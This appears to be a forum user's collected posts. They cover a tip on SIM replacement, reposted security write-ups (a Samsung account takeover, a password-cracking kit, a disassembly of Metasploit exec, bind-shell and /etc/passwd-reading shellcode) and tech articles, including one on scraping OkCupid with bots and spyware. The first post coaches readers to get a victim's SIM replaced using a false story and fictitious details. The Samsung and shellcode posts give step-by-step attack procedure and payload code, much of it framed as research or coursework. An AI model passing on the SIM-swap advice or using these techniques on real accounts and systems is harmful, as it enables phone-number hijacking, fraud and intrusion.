Everything posted by Nytro

  1. Yes, that's exactly what I was thinking too when my SIM card stopped working. To make it look more "real" you can take an Orange SIM, scratch it so that it no longer works, and ask them to replace it. But I think the better story is the lost phone, because in that case "someone else could be using the SIM in the meantime". PS: Don't rely on this. At least at Orange, when they replace your SIM, the bastards FORCE you to sign up for a subscription for 3 months (or more), and you need your ID card for that. In other words, if the real owner comes and complains, they might find out who did this to them. Try to get away without showing ID and give some fictitious details. Mind you, with those "fictitious" details you can probably end up at "forgery of documents" and get into legal trouble, so think about whether it's worth it.
  2. Rapid Object Detection in .NET By Huseyin Atasoy, 25 Jan 2014 Introduction The most popular and fastest implementation of the Viola-Jones object detection algorithm is undoubtedly the one in OpenCV. But OpenCV requires wrapper classes to be usable from .NET languages, and .NET Bitmap objects have to be converted to the IplImage format before they can be used with OpenCV. Moreover, programs that use OpenCV depend on all of the OpenCV libraries and their wrappers. These are not problems when OpenCV's other functions are needed anyway. But if we only need to detect objects on a Bitmap, it isn't worth making our programs dependent on all the OpenCV libraries and wrappers... I have written a library (HaarCascadeClassifier.dll) that makes object detection possible in .NET without any other library requirement. It is an open-source project that contains an implementation of the Viola-Jones object detection algorithm. The library uses haar cascades generated by OpenCV (XML files) to detect particular objects such as faces. It can be used for object detection, or simply to understand the algorithm and how its parameters affect the result or the speed. Background In fact, my purpose is to share HaarCascadeClassifier.dll and its usage, so I will only try to summarize the algorithm. The Viola-Jones algorithm doesn't use pixels directly to detect objects. It uses rectangular features that are called "haar-like features". These features can be represented using 2, 3, or 4 rectangles. Article: http://www.codeproject.com/Articles/436521/Rapid-Object-Detection-in-NET
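To make the "haar-like features" idea above more concrete, here is a minimal Python sketch of how a two-rectangle feature can be evaluated in constant time with an integral image. This is only an illustration of the technique the article describes; it is not code from HaarCascadeClassifier.dll or OpenCV, and the function names are my own.

import numpy as np

def integral_image(gray):
    # Summed-area table: ii[y, x] = sum of all pixels above and to the left, inclusive.
    return gray.cumsum(axis=0).cumsum(axis=1)

def rect_sum(ii, x, y, w, h):
    # Sum of the pixels in the rectangle with top-left corner (x, y), width w, height h,
    # computed with only four table lookups.
    A = ii[y - 1, x - 1] if x > 0 and y > 0 else 0
    B = ii[y - 1, x + w - 1] if y > 0 else 0
    C = ii[y + h - 1, x - 1] if x > 0 else 0
    D = ii[y + h - 1, x + w - 1]
    return D - B - C + A

def two_rect_feature(ii, x, y, w, h):
    # A horizontal two-rectangle haar-like feature: left half minus right half.
    return rect_sum(ii, x, y, w // 2, h) - rect_sum(ii, x + w // 2, y, w - w // 2, h)

# Toy example on a random 24x24 window (the classic Viola-Jones detection window size).
window = np.random.randint(0, 256, (24, 24)).astype(np.int64)
ii = integral_image(window)
print(two_rect_feature(ii, 0, 0, 24, 24))

A full cascade then thresholds many thousands of such features, arranged in stages, over every window position and scale.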
  3. [h=3]Today’s outage for several Google services[/h] Earlier today, most Google users who use logged-in services like Gmail, Google+, Calendar and Documents found they were unable to access those services for approximately 25 minutes. For about 10 percent of users, the problem persisted for as much as 30 minutes longer. Whether the effect was brief or lasted the better part of an hour, please accept our apologies—we strive to make all of Google’s services available and fast for you, all the time, and we missed the mark today. The issue has been resolved, and we’re now focused on correcting the bug that caused the outage, as well as putting more checks and monitors in place to ensure that this kind of problem doesn’t happen again. If you’re interested in the technical explanation for what occurred and how it was fixed, read on. At 10:55 a.m. PST this morning, an internal system that generates configurations—essentially, information that tells other systems how to behave—encountered a software bug and generated an incorrect configuration. The incorrect configuration was sent to live services over the next 15 minutes, causing users’ requests for their data to be ignored; those services, in turn, generated errors. Users began seeing these errors on affected services at 11:02 a.m., and at that time our internal monitoring alerted Google’s Site Reliability Team. Engineers were still debugging 12 minutes later when the same system, having automatically cleared the original error, generated a new correct configuration at 11:14 a.m. and began sending it; errors subsided rapidly starting at this time. By 11:30 a.m. the correct configuration was live everywhere and almost all users’ service was restored. With services once again working normally, our work is now focused on (a) removing the source of failure that caused today’s outage, and (b) speeding up recovery when a problem does occur. We'll be taking the following steps in the next few days: 1. Correcting the bug in the configuration generator to prevent recurrence, and auditing all other critical configuration generation systems to ensure they do not contain a similar bug. 2. Adding additional input validation checks for configurations, so that a bad configuration generated in the future will not result in service disruption. 3. Adding additional targeted monitoring to more quickly detect and diagnose the cause of service failure. Posted by Ben Treynor, VP Engineering Source: Official Blog: Today’s outage for several Google services
  4. [h=1]Compiling C# Code at Runtime[/h] By Lumír Kojecký, 25 Jan 2014 [h=2]Introduction[/h] Sometimes it is very useful to compile code at runtime. Personally, I use this feature mostly in these two cases: Simple web tutorials – writing a small piece of code into a TextBox control and executing it, instead of having to own or run an IDE. User-defined functions – I have written an application for symbolic regression with a simple configuration file where the user can choose some of my predefined functions (sin, cos, etc.). The user can also simply write his own mathematical expression with basic knowledge of the C# language. If you want to use this feature, you don’t have to install any third-party libraries. All functionality is provided by the .NET Framework in the Microsoft.CSharp and System.CodeDom.Compiler namespaces. Article: http://www.codeproject.com/Tips/715891/Compiling-Csharp-Code-at-Runtime
  5. Samsung.com Account Takeover Vulnerability Write-up First of all let me say this: Hurray! They fixed it! After contacting Samsung multiple times I thought they’d completely blown me off in fixing this bug, but it looks patched (hopefully!). EDIT: Samsung contacted me and said thanks for the report of the vulnerability. They seemed sincerely interested in fixing the problem – quite the opposite of my initial impression of them (their initial impression of me must’ve been odd considering I’m pretty sick with a cold at the time of this writing). The Vulnerability All Samsung.com accounts can be taken over due to an issue with character removal after authentication. When you register a Samsung.com account you can add extra spaces to the end of your account name and it will be registered as a separate account altogether. Alone this is not a big issue (other than perhaps spamming an email address by making multiple accounts with additional spaces after them). However, upon navigating to a Samsung subdomain such as the US shop site (shop.us.samsung.com), these trailing spaces are scrubbed from your username. Once this happens and you navigate back to Samsung.com you are authenticated as just the regular email address without any trailing spaces – effectively taking over your target’s account. So if your username was originally “admin@samsung.com<SPACE><SPACE>”, after visiting the US shop site it would be scrubbed to “admin@samsung.com”. Apparently scrubbing isn’t always a good thing (the security puns don’t get worse than that!) More detailed instructions (now patched, at least for shop.us.samsung.com): 1. Register an account at Samsung.com with the email address of a target; use Tamper Data or another HTTP intercept tool and add trailing spaces to the username. 2. Complete the account registration process. 3. Navigate to “shop.us.samsung.com”, ex: http://shop.us.samsung.com/store?Action=DisplayCustomerServiceOrderSearchPage&Locale-en_US&SiteID=samsung 4. Navigate back to the main Samsung.com domain, ex: a product page such as the Galaxy Note 10.1 - 2014 Edition. 5. Proceed to attempt to add items to your cart and go to the checkout page. 6. Notice the account details and cards on file are those of your target. Sadly, because this isn’t a Samsung TV there is no bug bounty for this exploit, but oh well. Proof of Concept Video Source: Samsung.com Account Takeover Vulnerability Write-up | The Hacker Blog
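The core of the bug described above is two components disagreeing on how a username is normalized. The following Python sketch is a hypothetical illustration of that bug class, not Samsung's actual code; the account store and function names are invented for the example.

accounts = {}

def register(username, owner):
    # Vulnerable: the raw string (trailing spaces included) is used as the key, so
    # "victim@example.com" and "victim@example.com  " become two separate accounts.
    if username in accounts:
        raise ValueError("already registered")
    accounts[username] = owner

def authenticate_via_subdomain(username):
    # A second component "scrubs" the username before looking it up,
    # collapsing the attacker's padded account onto the victim's.
    return accounts.get(username.strip())

register("victim@example.com", "victim")
register("victim@example.com  ", "attacker")                # attacker registers the padded variant
print(authenticate_via_subdomain("victim@example.com  "))   # -> 'victim': the attacker is now treated as the victim

The fix is to canonicalize usernames once, at registration, and use that same canonical form everywhere else.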
  6. [h=2]PACK – Password Analysis & Cracking Kit[/h] PACK (Password Analysis and Cracking Toolkit) is a collection of utilities developed to aid the analysis of password lists in order to enhance password cracking through pattern detection of masks, rules, character sets and other password characteristics. The toolkit generates valid input files for the Hashcat family of password crackers. Before using PACK, you must establish selection criteria for your password lists. Since we are looking to analyze the way people create their passwords, we must obtain as large a sample of leaked passwords as possible. One excellent list is based on the RockYou.com compromise. This list is both large and diverse enough to give good results for common passwords used on similar sites (e.g. social networking). The analysis obtained from this list may not work for organizations with specific password policies, so the sample input you select should be as close to your target as possible. In addition, try to avoid lists based on already-cracked passwords, as they will bias the statistics toward the rules and masks used by whoever cracked the list rather than the actual users. Please note this tool does not, and is not created to, crack passwords – it just aids the analysis of password sets so you can focus your cracking more accurately/efficiently/effectively. You can download PACK here: PACK-0.0.4.tar.gz Or read more here. Source: PACK - Password Analysis & Cracking Kit - Darknet - The Darkside
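To illustrate the kind of pattern detection described above, here is a small Python sketch that derives hashcat-style masks from a password sample and counts how often each mask occurs. It is only an illustration of the idea, not code taken from PACK, and the toy password list is made up.

from collections import Counter

def mask_of(password):
    # Map each character to a hashcat mask symbol: ?l lower, ?u upper, ?d digit, ?s symbol.
    out = []
    for c in password:
        if c.islower():
            out.append("?l")
        elif c.isupper():
            out.append("?u")
        elif c.isdigit():
            out.append("?d")
        else:
            out.append("?s")
    return "".join(out)

# Toy sample; in practice this would be a large leaked list such as rockyou.txt.
sample = ["password1", "Summer2013", "letmein", "P@ssw0rd", "123456", "monkey12"]
freq = Counter(mask_of(p) for p in sample)
for mask, count in freq.most_common():
    print(mask, count)

Sorting masks by frequency (and by how cheap they are to search) is what lets a mask attack cover the most likely password shapes first.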
  7. MARD: A Framework for Metamorphic Malware Analysis and Real-Time Detection Shahid Alam Department of Computer Science University of Victoria, BC, V8P5C2 E-mail: salam@cs.uvic.ca November 11, 2013 Introduction and Motivation End point security is often the last defense against a security threat. An end point can be a desktop, a server, a laptop, a kiosk or a mobile device that connects to a network (the Internet). Recent statistics by the ITU (International Telecommunication Union) [40] show that the share of Internet users (i.e., people connecting to the Internet using these end points) in the world has increased from 20% in 2006 to 35% (almost 2 billion in total) in 2011. A study carried out by Symantec about the impacts of cybercrime reports that worldwide losses due to malware attacks and phishing between July 2011 and July 2012 were $110 billion [26]. According to the 2011 Symantec Internet security threat report [25] there was an 81% increase in malware attacks over 2010, and 403 million new malware samples were created, a 41% increase over 2010. In 2012 there was a 42% increase in malware attacks over 2011, and web-based attacks increased by 30 percent in 2012. With these increases and the anticipated future increases, these end points pose a new security challenge [56] to the security professionals and researchers in industry and in academia: to devise new methods and techniques for malware detection and protection. There are numerous definitions in the literature of malware, also called malicious code, which includes viruses, worms, spyware and trojans. Here I am going to use one of the earliest definitions, by Gary McGraw and Greg Morrisett [49]: Malicious code is any code added, changed, or removed from a software system in order to intentionally cause harm or subvert the intended function of the system. A malware carries out activities such as setting up a back door for a bot, setting up a keyboard logger and stealing personal information, etc. Antimalware software detects and neutralizes the effects of malware. There are two basic detection techniques [39]: anomaly-based and signature-based. Anomaly-based detection uses the knowledge of the behavior of a normal program to decide if the program under inspection is malicious or not. Signature-based detection uses the characteristics of a malicious program to decide if the program under inspection is malicious or not. Each of the techniques can be performed statically (before the program executes), dynamically (during or after the program execution) or both statically and dynamically (hybrid). Download: http://webhome.cs.uvic.ca/~salam/PhD/TR-MARD.pdf
  8. Assignment five is about analyzing three different shellcodes created with msfpayload for Linux/x86. linux/x86/exec I chose the linux/x86/exec shellcode as the first example. With: $ msfpayload linux/x86/exec cmd="ls" R | ndisasm -u - it is possible to disassemble the shellcode: 00000000 6A0B push byte +0xb 00000002 58 pop eax 00000003 99 cdq 00000004 52 push edx 00000005 66682D63 push word 0x632d 00000009 89E7 mov edi,esp 0000000B 682F736800 push dword 0x68732f 00000010 682F62696E push dword 0x6e69622f 00000015 89E3 mov ebx,esp 00000017 52 push edx 00000018 E803000000 call dword 0x20 0000001D 6C insb 0000001E 7300 jnc 0x20 00000020 57 push edi 00000021 53 push ebx 00000022 89E1 mov ecx,esp 00000024 CD80 int 0x80 I will now comment on the relevant lines of the shellcode. 00000000 6A0B push byte +0xb 00000002 58 pop eax EAX is set to 0xb = 11. This is the syscall number for execve: $ grep 11 /usr/include/i386-linux-gnu/asm/unistd_32.h #define __NR_execve 11 ... SNIP ... 00000003 99 cdq 00000004 52 push edx Set EDX to zero (cdq sign-extends EAX, which is small and positive, so EDX becomes 0) and push it onto the stack as a terminator. 00000005 66682D63 push word 0x632d This pushes “-c” onto the stack. 00000009 89E7 mov edi,esp Move the stack pointer to EDI, so EDI points to “-c”. 0000000B 682F736800 push dword 0x68732f 00000010 682F62696E push dword 0x6e69622f 00000015 89E3 mov ebx,esp Push /bin/sh onto the stack and move the stack pointer to EBX, so EBX points to “/bin/sh”. It can be seen that the ls command is not executed directly. A shell is called with the -c option. From the bash man page: “-c string If the -c option is present, then commands are read from string. If there are arguments after the string, they are assigned to the positional parameters, starting with $0.” 00000017 52 push edx Push a zero again. 00000018 E803000000 call dword 0x20 This call jumps to 0x20 and, as a side effect, pushes the address of the bytes that follow it (the string “ls”) onto the stack as the return address. 00000020 57 push edi 00000021 53 push ebx 00000022 89E1 mov ecx,esp 00000024 CD80 int 0x80 EDI (“-c”) and EBX (“/bin/sh”) are pushed onto the stack, ESP is moved into ECX, and the syscall is executed. Now here comes the interesting part. The command “ls” is not visible as an instruction in the disassembly or while debugging with gdb, but it is in the code (as hex: 6c 73). 0000001D 6C insb 0000001E 7300 jnc 0x20 These bytes are not real instructions but the “ls” string, whose address ends up on the stack via the call above, although the debugger does not show anything of that… hmpf. So maybe libemu can help us here. For analyzing the shellcode with libemu I use: $ msfpayload linux/x86/exec cmd="ls" R | sctest -vvv -Ss 100000 -G Exec.dot The ls command should be executed. The output shows exactly how the execve call is built. ... SNIP ... [emu 0x0x8f3e088 debug ] Flags: int execve ( const char * dateiname = 0x00416fc0 => = "/bin/sh"; const char * argv[] = [ = 0x00416fb0 => = 0x00416fc0 => = "/bin/sh"; = 0x00416fb4 => = 0x00416fc8 => = "-c"; = 0x00416fb8 => = 0x0041701d => = "ls"; = 0x00000000 => none; ]; const char * envp[] = 0x00000000 => none; ) = 0; ... SNIP ... Here it can be seen that the “ls” command is on the stack too. From the Exec.dot file a diagram can be made to illustrate the program execution. dot Exec.dot -Tpng -o Exec.dot.png Exec.dot That was it for the first shellcode. linux/x86/shell_bind_tcp For the second shellcode to analyze I chose linux/x86/shell_bind_tcp.
Disassembling works as follows: $ msfpayload linux/x86/shell_bind_tcp LPORT=4444 R | ndisasm -u - 00000000 31DB xor ebx,ebx 00000002 F7E3 mul ebx 00000004 53 push ebx 00000005 43 inc ebx 00000006 53 push ebx 00000007 6A02 push byte +0x2 00000009 89E1 mov ecx,esp 0000000B B066 mov al,0x66 0000000D CD80 int 0x80 0000000F 5B pop ebx 00000010 5E pop esi 00000011 52 push edx 00000012 680200115C push dword 0x5c110002 00000017 6A10 push byte +0x10 00000019 51 push ecx 0000001A 50 push eax 0000001B 89E1 mov ecx,esp 0000001D 6A66 push byte +0x66 0000001F 58 pop eax 00000020 CD80 int 0x80 00000022 894104 mov [ecx+0x4],eax 00000025 B304 mov bl,0x4 00000027 B066 mov al,0x66 00000029 CD80 int 0x80 0000002B 43 inc ebx 0000002C B066 mov al,0x66 0000002E CD80 int 0x80 00000030 93 xchg eax,ebx 00000031 59 pop ecx 00000032 6A3F push byte +0x3f 00000034 58 pop eax 00000035 CD80 int 0x80 00000037 49 dec ecx 00000038 79F8 jns 0x32 0000003A 682F2F7368 push dword 0x68732f2f 0000003F 682F62696E push dword 0x6e69622f 00000044 89E3 mov ebx,esp 00000046 50 push eax 00000047 53 push ebx 00000048 89E1 mov ecx,esp 0000004A B00B mov al,0xb 0000004C CD80 int 0x80 And here is the output from the libemu analysis. $ msfpayload linux/x86/shell_bind_tcp LPORT=4444 R | sctest -vvv -Ss 100000 -G shell_bind_tcp.dot ... SNIP ... int socket ( int domain = 2; int type = 1; int protocol = 0; ) = 14; int bind ( int sockfd = 14; struct sockaddr_in * my_addr = 0x00416fc2 => struct = { short sin_family = 2; unsigned short sin_port = 23569 (port=4444); struct in_addr sin_addr = { unsigned long s_addr = 0 (host=0.0.0.0); }; char sin_zero = " "; }; int addrlen = 16; ) = 0; int listen ( int s = 14; int backlog = 0; ) = 0; int accept ( int sockfd = 14; sockaddr_in * addr = 0x00000000 => none; int addrlen = 0x00000010 => none; ) = 19; int dup2 ( int oldfd = 19; int newfd = 14; ) = 14; int dup2 ( int oldfd = 19; int newfd = 13; ) = 13; int dup2 ( int oldfd = 19; int newfd = 12; ) = 12; int dup2 ( int oldfd = 19; int newfd = 11; ) = 11; int dup2 ( int oldfd = 19; int newfd = 10; ) = 10; int dup2 ( int oldfd = 19; int newfd = 9; ) = 9; int dup2 ( int oldfd = 19; int newfd = 8; ) = 8; int dup2 ( int oldfd = 19; int newfd = 7; ) = 7; int dup2 ( int oldfd = 19; int newfd = 6; ) = 6; int dup2 ( int oldfd = 19; int newfd = 5; ) = 5; int dup2 ( int oldfd = 19; int newfd = 4; ) = 4; int dup2 ( int oldfd = 19; int newfd = 3; ) = 3; int dup2 ( int oldfd = 19; int newfd = 2; ) = 2; int dup2 ( int oldfd = 19; int newfd = 1; ) = 1; int dup2 ( int oldfd = 19; int newfd = 0; ) = 0; int execve ( const char * dateiname = 0x00416fb2 => = "/bin//sh"; const char * argv[] = [ = 0x00416faa => = 0x00416fb2 => = "/bin//sh"; = 0x00000000 => none; ]; const char * envp[] = 0x00000000 => none; ) = 0; ... SNIP ... I will now analyze the relevant parts of the shellcode, using both the disassembly and the libemu output for the explanation. 00000000 31DB xor ebx,ebx 00000002 F7E3 mul ebx 00000004 53 push ebx 00000005 43 inc ebx 00000006 53 push ebx 00000007 6A02 push byte +0x2 00000009 89E1 mov ecx,esp 0000000B B066 mov al,0x66 0000000D CD80 int 0x80 First the EBX and EAX registers are filled with zeros. EBX is pushed on the stack, then EBX is set to one and pushed again. After this, 2 is pushed on the stack. Then the stack address is moved into ECX and EAX is set to 0x66, the syscall number (102) for the socketcall function, which is invoked afterwards. In this case the socket() function is executed.
The corresponding libemu output: int socket ( int domain = 2; int type = 1; int protocol = 0; ) = 14; 0000000F 5B pop ebx 00000010 5E pop esi 00000011 52 push edx 00000012 680200115C push dword 0x5c110002 00000017 6A10 push byte +0x10 00000019 51 push ecx 0000001A 50 push eax 0000001B 89E1 mov ecx,esp 0000001D 6A66 push byte +0x66 0000001F 58 pop eax 00000020 CD80 int 0x80 To shorten things a little, this part calls the bind function (EAX is again 0x66, the socketcall syscall 102, while the popped EBX is now 2 = SYS_BIND = bind()). This corresponds to the libemu output (the whole output can be seen above). int bind ( int sockfd = 14; struct sockaddr_in * my_addr = 0x00416fc2 => struct = { short sin_family = 2; unsigned short sin_port = 23569 (port=4444); struct in_addr sin_addr = { unsigned long s_addr = 0 (host=0.0.0.0); }; char sin_zero = " "; }; int addrlen = 16; ) = 0; 0x5c11 is port 4444 in network byte order, btw. 00000022 894104 mov [ecx+0x4],eax 00000025 B304 mov bl,0x4 00000027 B066 mov al,0x66 00000029 CD80 int 0x80 Here EAX is set to 0x66 again and EBX to 4, which selects the listen() function. $ less /usr/include/linux/net.h | grep 4 #define SYS_LISTEN 4 /* sys_listen(2) */ Here is the libemu output: int listen ( int s = 14; int backlog = 0; ) = 0; 0000002B 43 inc ebx 0000002C B066 mov al,0x66 0000002E CD80 int 0x80 EBX is now 5, which selects the accept() function… int accept ( int sockfd = 14; sockaddr_in * addr = 0x00000000 => none; int addrlen = 0x00000010 => none; ) = 19; 00000030 93 xchg eax,ebx 00000031 59 pop ecx 00000032 6A3F push byte +0x3f 00000034 58 pop eax 00000035 CD80 int 0x80 00000037 49 dec ecx 00000038 79F8 jns 0x32 EAX = 0x3f = 63, which is the syscall number for dup2. $ grep 63 /usr/include/i386-linux-gnu/asm/unistd_32.h #define __NR_dup2 63 This procedure is repeated until ECX = 0, so the connected socket is duplicated onto every file descriptor down to stdin, stdout and stderr. 0000003A 682F2F7368 push dword 0x68732f2f 0000003F 682F62696E push dword 0x6e69622f 00000044 89E3 mov ebx,esp 00000046 50 push eax 00000047 53 push ebx 00000048 89E1 mov ecx,esp 0000004A B00B mov al,0xb 0000004C CD80 int 0x80 Finally we have the execve call. This works pretty much as in the analysis of the linux/x86/exec shellcode. int execve ( const char * dateiname = 0x00416fb2 => = "/bin//sh"; const char * argv[] = [ = 0x00416faa => = 0x00416fb2 => = "/bin//sh"; = 0x00000000 => none; ]; const char * envp[] = 0x00000000 => none; ) = 0; I also used the debugger to analyze the shellcode, but I think its output does not help any further. And finally the flowchart. $ dot shell_bind_tcp.dot -Tpng -o shell_bind_tcp.dot.png shell_bind_tcp.dot So that was it for the second analysis. linux/x86/read_file So let us start by disassembling the shellcode: $ sudo msfpayload linux/x86/read_file PATH="/etc/passwd" R | ndisasm -u - 00000000 EB36 jmp short 0x38 00000002 B805000000 mov eax,0x5 00000007 5B pop ebx 00000008 31C9 xor ecx,ecx 0000000A CD80 int 0x80 0000000C 89C3 mov ebx,eax 0000000E B803000000 mov eax,0x3 00000013 89E7 mov edi,esp 00000015 89F9 mov ecx,edi 00000017 BA00100000 mov edx,0x1000 0000001C CD80 int 0x80 0000001E 89C2 mov edx,eax 00000020 B804000000 mov eax,0x4 00000025 BB01000000 mov ebx,0x1 0000002A CD80 int 0x80 0000002C B801000000 mov eax,0x1 00000031 BB00000000 mov ebx,0x0 00000036 CD80 int 0x80 00000038 E8C5FFFFFF call dword 0x2 0000003D 2F das 0000003E 657463 gs jz 0xa4 00000041 2F das 00000042 7061 jo 0xa5 00000044 7373 jnc 0xb9 00000046 7764 ja 0xac 00000048 00 db 0x00 Libemu and sctest did not work for me. So I will only look at the disassembly and debugging.
First things first: the shellcode is using the JMP-CALL-POP technique. This can be seen very well by stepping through the code, but also by having a look at the disassembled code. 00000000 EB36 jmp short 0x38 Jump to address 0x38. 00000038 E8C5FFFFFF call dword 0x2 0000003D 2F das 0000003E 657463 gs jz 0xa4 00000041 2F das 00000042 7061 jo 0xa5 00000044 7373 jnc 0xb9 00000046 7764 ja 0xac 00000048 00 db 0x00 Call 0x2. Be aware that 0x3D – 0x48 is a data section; it contains nothing but the path /etc/passwd, whose address the call pushes onto the stack. 00000002 B805000000 mov eax,0x5 00000007 5B pop ebx 00000008 31C9 xor ecx,ecx 0000000A CD80 int 0x80 Move 5 into EAX for syscall 5, which is open(). Pop the address of /etc/passwd into EBX, and execute. The file descriptor is returned in EAX, for example 3. 0000000C 89C3 mov ebx,eax 0000000E B803000000 mov eax,0x3 00000013 89E7 mov edi,esp 00000015 89F9 mov ecx,edi 00000017 BA00100000 mov edx,0x1000 0000001C CD80 int 0x80 Here the syscall for read() is executed. For this, EAX is set to 3 (the read syscall) and EBX receives the file descriptor; ECX points to the buffer on the stack (via EDI) and EDX, which holds the size, is set to 0x1000. 0000001E 89C2 mov edx,eax 00000020 B804000000 mov eax,0x4 00000025 BB01000000 mov ebx,0x1 0000002A CD80 int 0x80 So finally the result is written (syscall 4 is write()) to the standard output. 0000002C B801000000 mov eax,0x1 00000031 BB00000000 mov ebx,0x0 00000036 CD80 int 0x80 And exit. So that was it for the last analysis. This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: Assembly Language and Shellcoding on Linux
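As a supplementary note (not part of the original assignment write-up): the same raw payloads can also be disassembled from Python with the Capstone bindings instead of ndisasm, which is handy when you want to post-process the instructions. This assumes the capstone package is installed and that the raw payload was saved to a file whose name is purely illustrative here.

# e.g. generate the raw bytes first:  msfpayload linux/x86/exec cmd="ls" R > exec.bin
from capstone import Cs, CS_ARCH_X86, CS_MODE_32

with open("exec.bin", "rb") as f:      # hypothetical file name
    code = f.read()

md = Cs(CS_ARCH_X86, CS_MODE_32)       # 32-bit x86, matching the linux/x86 payloads above
for insn in md.disasm(code, 0x0):
    print("%08x  %-10s %s" % (insn.address, insn.mnemonic, insn.op_str))

Note that, just like ndisasm, a linear disassembler will still happily decode the embedded data bytes (the "ls" and "/etc/passwd" strings) as bogus instructions; only emulation (libemu) or careful reading reveals them as data.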
  9. How a Math Genius Hacked OkCupid to Find True Love By Kevin Poulsen 01.21.14 6:30 AM Mathematician Chris McKinlay hacked OkCupid to find the girl of his dreams. (Photo: Emily Shur) Chris McKinlay was folded into a cramped fifth-floor cubicle in UCLA’s math sciences building, lit by a single bulb and the glow from his monitor. It was 3 in the morning, the optimal time to squeeze cycles out of the supercomputer in Colorado that he was using for his PhD dissertation. (The subject: large-scale data processing and parallel numerical methods.) While the computer chugged, he clicked open a second window to check his OkCupid inbox. McKinlay, a lanky 35-year-old with tousled hair, was one of about 40 million Americans looking for romance through websites like Match.com, J-Date, and e-Harmony, and he’d been searching in vain since his last breakup nine months earlier. He’d sent dozens of cutesy introductory messages to women touted as potential matches by OkCupid’s algorithms. Most were ignored; he’d gone on a total of six first dates. On that early morning in June 2012, his compiler crunching out machine code in one window, his forlorn dating profile sitting idle in the other, it dawned on him that he was doing it wrong. He’d been approaching online matchmaking like any other user. Instead, he realized, he should be dating like a mathematician. OkCupid was founded by Harvard math majors in 2004, and it first caught daters’ attention because of its computational approach to matchmaking. Members answer droves of multiple-choice survey questions on everything from politics, religion, and family to love, sex, and smartphones. On average, respondents select 350 questions from a pool of thousands—“Which of the following is most likely to draw you to a movie?” or “How important is religion/God in your life?” For each, the user records an answer, specifies which responses they’d find acceptable in a mate, and rates how important the question is to them on a five-point scale from “irrelevant” to “mandatory.” OkCupid’s matching engine uses that data to calculate a couple’s compatibility. The closer to 100 percent—mathematical soul mate—the better. But mathematically, McKinlay’s compatibility with women in Los Angeles was abysmal. OkCupid’s algorithms use only the questions that both potential matches decide to answer, and the match questions McKinlay had chosen—more or less at random—had proven unpopular. When he scrolled through his matches, fewer than 100 women would appear above the 90 percent compatibility mark. And that was in a city containing some 2 million women (approximately 80,000 of them on OkCupid). On a site where compatibility equals visibility, he was practically a ghost. He realized he’d have to boost that number. If, through statistical sampling, McKinlay could ascertain which questions mattered to the kind of women he liked, he could construct a new profile that honestly answered those questions and ignored the rest. He could match every woman in LA who might be right for him, and none that weren’t. Chris McKinlay used Python scripts to riffle through hundreds of OkCupid survey questions. He then sorted female daters into seven clusters, like “Diverse” and “Mindful,” each with distinct characteristics. (Photo: Mauricio Alejo) Even for a mathematician, McKinlay is unusual. Raised in a Boston suburb, he graduated from Middlebury College in 2001 with a degree in Chinese.
In August of that year he took a part-time job in New York translating Chinese into English for a company on the 91st floor of the north tower of the World Trade Center. The towers fell five weeks later. (McKinlay wasn’t due at the office until 2 o’clock that day. He was asleep when the first plane hit the north tower at 8:46 am.) “After that I asked myself what I really wanted to be doing,” he says. A friend at Columbia recruited him into an offshoot of MIT’s famed professional blackjack team, and he spent the next few years bouncing between New York and Las Vegas, counting cards and earning up to $60,000 a year. The experience kindled his interest in applied math, ultimately inspiring him to earn a master’s and then a PhD in the field. “They were capable of using mathematics in lots of different situations,” he says. “They could see some new game—like Three Card Pai Gow Poker—then go home, write some code, and come up with a strategy to beat it.” Now he’d do the same for love. First he’d need data. While his dissertation work continued to run on the side, he set up 12 fake OkCupid accounts and wrote a Python script to manage them. The script would search his target demographic (heterosexual and bisexual women between the ages of 25 and 45), visit their pages, and scrape their profiles for every scrap of available information: ethnicity, height, smoker or nonsmoker, astrological sign—“all that crap,” he says. To find the survey answers, he had to do a bit of extra sleuthing. OkCupid lets users see the responses of others, but only to questions they’ve answered themselves. McKinlay set up his bots to simply answer each question randomly—he wasn’t using the dummy profiles to attract any of the women, so the answers didn’t matter—then scooped the women’s answers into a database. McKinlay watched with satisfaction as his bots purred along. Then, after about a thousand profiles were collected, he hit his first roadblock. OkCupid has a system in place to prevent exactly this kind of data harvesting: It can spot rapid-fire use easily. One by one, his bots started getting banned. He would have to train them to act human. He turned to his friend Sam Torrisi, a neuroscientist who’d recently taught McKinlay music theory in exchange for advanced math lessons. Torrisi was also on OkCupid, and he agreed to install spyware on his computer to monitor his use of the site. With the data in hand, McKinlay programmed his bots to simulate Torrisi’s click-rates and typing speed. He brought in a second computer from home and plugged it into the math department’s broadband line so it could run uninterrupted 24 hours a day. After three weeks he’d harvested 6 million questions and answers from 20,000 women all over the country. McKinlay’s dissertation was relegated to a side project as he dove into the data. He was already sleeping in his cubicle most nights. Now he gave up his apartment entirely and moved into the dingy beige cell, laying a thin mattress across his desk when it was time to sleep. For McKinlay’s plan to work, he’d have to find a pattern in the survey data—a way to roughly group the women according to their similarities. The breakthrough came when he coded up a modified Bell Labs algorithm called K-Modes. First used in 1998 to analyze diseased soybean crops, it takes categorical data and clumps it like the colored wax swimming in a Lava Lamp. With some fine-tuning he could adjust the viscosity of the results, thinning it into a slick or coagulating it into a single, solid glob.
He played with the dial and found a natural resting point where the 20,000 women clumped into seven statistically distinct clusters based on their questions and answers. “I was ecstatic,” he says. “That was the high point of June.” He retasked his bots to gather another sample: 5,000 women in Los Angeles and San Francisco who’d logged on to OkCupid in the past month. Another pass through K-Modes confirmed that they clustered in a similar way. His statistical sampling had worked. Now he just had to decide which cluster best suited him. He checked out some profiles from each. One cluster was too young, two were too old, another was too Christian. But he lingered over a cluster dominated by women in their mid-twenties who looked like indie types, musicians and artists. This was the golden cluster. The haystack in which he’d find his needle. Somewhere within, he’d find true love. Actually, a neighboring cluster looked pretty cool too—slightly older women who held professional creative jobs, like editors and designers. He decided to go for both. He’d set up two profiles and optimize one for the A group and one for the B group. He text-mined the two clusters to learn what interested them; teaching turned out to be a popular topic, so he wrote a bio that emphasized his work as a math professor. The important part, though, would be the survey. He picked out the 500 questions that were most popular with both clusters. He’d already decided he would fill out his answers honestly—he didn’t want to build his future relationship on a foundation of computer-generated lies. But he’d let his computer figure out how much importance to assign each question, using a machine-learning algorithm called adaptive boosting to derive the best weightings. Source: How a Math Genius Hacked OkCupid to Find True Love - Wired Science
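For readers curious what the clustering step above looks like in practice, here is a small, purely illustrative Python sketch. The article does not say which K-Modes implementation McKinlay used (his was a modified version), so this uses the open-source kmodes package on made-up categorical survey answers; the numbers and column layout are invented for the example.

import numpy as np
from kmodes.kmodes import KModes   # pip install kmodes

# Rows = profiles, columns = answers to multiple-choice questions, encoded as small integers.
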